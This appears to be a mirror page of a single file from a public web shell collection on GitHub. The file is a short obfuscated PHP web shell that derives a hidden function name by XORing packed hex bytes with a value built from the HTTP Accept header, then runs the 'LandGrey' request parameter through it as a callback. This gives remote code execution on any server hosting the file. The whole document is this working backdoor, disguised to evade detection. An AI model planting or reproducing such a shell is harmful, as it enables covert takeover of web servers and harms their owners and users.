mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
8 lines
234 B
PHP
8 lines
234 B
PHP
|
<?php
|
||
|
$password = "LandGrey";
|
||
|
$key = substr(__FILE__,-5,-4);
|
||
|
${"LandGrey"} = $_SERVER["HTTP_ACCEPT"]."Land!";
|
||
|
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
|
||
|
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
|
||
|
?>
|